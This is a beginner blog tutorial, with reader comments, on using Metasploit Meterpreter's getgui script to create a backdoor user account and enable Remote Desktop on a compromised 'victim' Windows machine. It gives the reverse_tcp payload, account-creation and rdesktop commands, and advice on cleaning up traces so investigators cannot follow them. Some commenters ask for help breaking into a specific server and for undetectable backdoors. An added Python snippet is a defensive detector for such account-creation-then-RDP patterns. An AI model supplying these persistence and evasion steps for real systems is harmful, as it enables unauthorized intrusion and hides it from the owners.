5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Type : Tutorial

Level : Beginner, Medium

Last year, when I was teaching a computer security class, one student came and asked, "Can you give me a simple tutorial on how to use the command prompt?" I said, "I don't think it can be done in a short course, because to learn the command prompt you should practice every day at first and make it as familiar as your mother tongue." From this situation I know that not everyone knows about the command prompt or other console-based tools. How about hacking? Yep, it's the same… sometimes newcomers just follow tutorials without knowing exactly what they are doing.

Today I will write a simple tutorial on how to enable Remote Desktop (which uses the Remote Desktop Protocol on TCP port 3389) once you are already inside a remote system, using the Metasploit Framework. This method is useful if you are not comfortable with the command prompt. In this case, we will use Carlos Perez's 'getgui' script, which enables Remote Desktop and creates a user account for you to log in with.

Requirements:

1. Metasploit Framework

2. BackTrack 5 (or another Linux OS)

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter :

1. My favourite meterpreter payload uses reverse_tcp. If you also like to use reverse_tcp for your payload, you can set it with the command below.

set payload windows/meterpreter/reverse_tcp

2. Inside the meterpreter, execute

meterpreter > run getgui -h

to view the help.

3. To add a user with the username valent and the password r4h45i4, and then enable the Remote Desktop service, run:

run getgui -u valent -p r4h45i4

Yep, we have successfully created the user and activated the Remote Desktop service.

Please note the last line of the output, "For cleanup use command : run multi_console_command….bla…bla….bla"; it will be used after you finish using the Remote Desktop service on the victim computer.

4. To connect to the victim using Remote Desktop, we can use the rdesktop program (it is already installed on BackTrack).

rdesktop -u <username> -p <password> <ip-address-target>

initializing……and then….

5. You should also remember that adding a user means adding one new user on the remote computer. Be wise in using this method, because the more changes you make, the more traces you leave on the remote computer, and they can be tracked by investigators :-) . To clean up the user we've already created before (you can see it in step 3).

Finish…

Hope it's useful for you… any questions? Just drop them in the comment box. :-)
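
Step 5 observes that the new account and the enabled service leave changes that investigators can track. As an added example (not part of the original post and not code from the getgui script), the Python code below correlates those traces from the defender's side: account creation (Security event 4720), addition to a local group (4732) and a Remote Desktop logon (4624, logon type 10). The sample records, SIDs, addresses, group list and 30-minute window are constructed assumptions, and the event IDs are those of Windows Vista and later.

```python
from datetime import datetime, timedelta

# Constructed sample records (not from the page). Field names follow the
# Windows Security log (Vista and later); SIDs, names and IPs are made up.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:05", "id": 4720, "TargetUserName": "svc_test",
     "TargetSid": "S-1-5-21-1-2-3-1105"},
    {"time": "2024-05-01T10:00:06", "id": 4732, "MemberSid": "S-1-5-21-1-2-3-1105",
     "TargetUserName": "Remote Desktop Users"},
    {"time": "2024-05-01T10:00:07", "id": 4732, "MemberSid": "S-1-5-21-1-2-3-1105",
     "TargetUserName": "Administrators"},
    {"time": "2024-05-01T10:03:40", "id": 4624, "LogonType": 10,
     "TargetUserSid": "S-1-5-21-1-2-3-1105", "IpAddress": "192.0.2.15"},
    # Benign: a long-standing account logging on over Remote Desktop.
    {"time": "2024-05-01T11:00:00", "id": 4624, "LogonType": 10,
     "TargetUserSid": "S-1-5-21-1-2-3-500", "IpAddress": "192.0.2.20"},
    # Benign: a new account that is never placed in a sensitive group.
    {"time": "2024-05-01T12:00:00", "id": 4720, "TargetUserName": "intern01",
     "TargetSid": "S-1-5-21-1-2-3-1106"},
]

# Assumption: the local groups whose membership matters for this detection.
SENSITIVE_GROUPS = {"Administrators", "Remote Desktop Users"}

def find_new_account_rdp(events, window_minutes=30):
    """Return {sid: finding} for accounts created and then granted RDP or
    admin rights within the window, with any RDP logons seen in that window."""
    window = timedelta(minutes=window_minutes)
    created, findings = {}, {}
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:  # a user account was created
            created[ev["TargetSid"]] = (ts, ev["TargetUserName"])
        elif ev["id"] == 4732 and ev["TargetUserName"] in SENSITIVE_GROUPS:
            born = created.get(ev["MemberSid"])  # member added to local group
            if born and ts - born[0] <= window:
                hit = findings.setdefault(
                    ev["MemberSid"], {"user": born[1], "groups": [], "rdp_from": []})
                hit["groups"].append(ev["TargetUserName"])
        elif ev["id"] == 4624 and ev.get("LogonType") == 10:  # RemoteInteractive
            hit = findings.get(ev["TargetUserSid"])
            if hit and ts - created[ev["TargetUserSid"]][0] <= window:
                hit["rdp_from"].append(ev["IpAddress"])
    return findings

if __name__ == "__main__":
    for sid, hit in find_new_account_rdp(SAMPLE_EVENTS).items():
        print(sid, hit)
```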

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

50 Responses to “5 Steps to Enable Remote Desktop Using Metasploit Meterpreter”

  1. Hagai says:

    Hi,
    I have a beginner's Q. :)
    Where do I find the Meterpreter in BT5?

  2. puppet says:

    How do we know the username and password of the victim???
    And do we need to add a new user to the victim computer?

    • v4L says:

      #puppet
      First of all, you should find a vulnerable target… and then try to compromise it… when you successfully compromise the target, you don't need to input any password or username :-)

  3. mehdi says:

    I have a problem: Unknown command: rdesktop

  4. th3bAdh says:

    I have a problem with rdesktop: the password was invalid, but I've double-checked the password and I'm still getting the error.

  5. vir0e5 says:

    Thx for info….
    Download RDesktop
    http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz

  6. josh says:

    I am using the following payload:
     (windows/shell/reverse_tcp):
    but when I run the exploit..
    after the binding, it says "Sending exploit …"
    and then it returns me to ….msf  exploit(ms03_026_dcom) > 
    so nothing happens….. Do you know what could be the possible reason for this?
    Thanks!

  7. bagus says:

    When I write getgui – h run and run the command, it says unknown..
    What should I do?

  8. DeusIgni says:

    Whenever I attempt to create a shell on the target computer, the handler is created on my end, but the connection times out. Why is that? Is it an error on my end?
    -DeusIgni

    • v4L says:

      #Deuslgni
      Hmm, maybe the target prevents you from creating it… getting meterpreter doesn't mean that you'll also get the shell… it depends on the vulnerability ranking… FYI, the target machine in this tutorial was XP SP0..

  9. DeusIgni says:

    Is there a way to use this exploit on XP SP3?
    -DeusIgni

  10. boby says:

    Hi,
    I am using BT5 R2 in VMware. I am trying to remotely control my Win 7 desktop. When meterpreter session -i 1 is started, like
    meterpreter>
    when I enter the shell, pwd or cd command it gives me an unknown command error.
    What should I do??

    • v4L says:

      #boby
      Maybe the rating of the exploit you use is not an excellent one. BTW, if you want to try and make sure it works, you can view this tutorial http://www./hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/

  11. boby says:

    I'm using windows/meterpreter/reverse_tcp and I have the same problem. I have tried java_signed_applet and I still have this "unknown command" problem. When I was using BackTrack 5 R1 it was working very well.
    Is there an installation problem, or are there some bugs in BackTrack 5 R2???

  12. boby says:

    metertreter>pwd
    pwd unknoun command
    same problem

    • v4L says:

      #boby
      Hmmm…. maybe you can try to update your Metasploit Framework first by using the msfupdate command.

      • boby says:

        Thank you very much for your reply… :)

        Which tool of BackTrack 5 must be updated after installation?? And which command do I have to use???

        I am using these commands
        for msf
        =======
        1,msfupdate
        for library
        ===========
        2,apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

        Which command would you suggest to update BackTrack 5 R1 or BackTrack 5 R2 for better performance?

        • v4L says:

          #boby
          BTW, I don't know the exact cause of your problem or how you installed your BT. Maybe you can also try to update your system using apt-get update and apt-get upgrade.

  13. boby says:

    My problem is solved. Thanks for your help.

  14. deff says:

    what is stupidity, provide a metasploit payload when you just need to add a user to a group and start a service from the shell. I understand the reason you provide it, but it would be a lot more useful to actually explain it than to just provide for script kiddies…

    • v4L says:

      #deff
      LoL… maybe what you mean is http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
      If you think like that, why didn't you contribute by writing an “awesome tutorial” here? Or maybe give your own tutorial link… don't just talk and criticize without action :-P it's just wasting your time… :-)
      PS: next time it's better to use your real e-mail, not the fake one :-)
      merci monsieur

  15. Puka says:

    I have Metasploit 4.4 GUI Community Edition but no change to exploit. BTW, I have Windows 7 SP1.

  16. anonymous says:

    I have installed BackTrack on VMware and hacked my Windows 7 system with the system's internal IP, but how can I set my dynamic IP to hack a computer remotely?

  17. Samuel says:

    Hi, when I tried to do the rdesktop -u ( ) -p ( ) and the IP address and pressed Enter, it says Autoselected keyboard map en-us and does not do anything… do you know why that happens?

    • v4L says:

      #samuel
      Hmm… maybe the Remote Desktop service on the victim PC hasn't started yet..
      Maybe you can take a look at this tutorial: http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/

  18. Thirteen says:

    Thanks for your time and effort to provide tutorials!

  19. boby says:

    Hi,

    Please give me a tutorial to hack a PC on another network. Please guide me.

  20. Remaro says:

    Like other people, I am also getting the “unknown command” error once the meterpreter prompt is up, and no commands will work. You can see it here: http://imgur.com/WK2KQ What causes this?

  21. Josh says:

    After executing this command:
    run getgui -u testuser -p testpass

    it shows me this message:
    This version of Meterpreter is not supported with this Script!

    What's the problem?

  22. boby says:

    Hi,

    I want to download vanish.sh and crypter.ph for BackTrack 5 R3. I searched for them on Google but I cannot find them. Kindly give me these undetectable backdoors or a download link. I will be very thankful to you.

  23. fahmi says:

    After I type set payload windows/meterpreter/reverse_tcp the meterpreter won't show up, why? Thanks

  24. intoxicate says:

    Hey, I've tried to use getgui through meterpreter but apparently it doesn't add a user to the remote machine. To prove this, I got on my remote host and ran the net command to see if any user had been added to the administrator local group. But no user has been added to that group. Since it doesn't add a user to the remote host, I cannot log in via rdesktop. I'm not sure if the script is not working properly or I did something wrong.

  25. sheaz says:

    Dear

    v4L i want to hack a server its ip is 203.128.26.xxx and remote desktop is already on. i am new in this field. please only make user in this server and please give me user name and password i am very thankful to you.

  26. akbar says:

    I am a student from Iran..
    Thanks for this tutorial….!

  27. GuestMan says:

    Does it work when the victim has Linux?
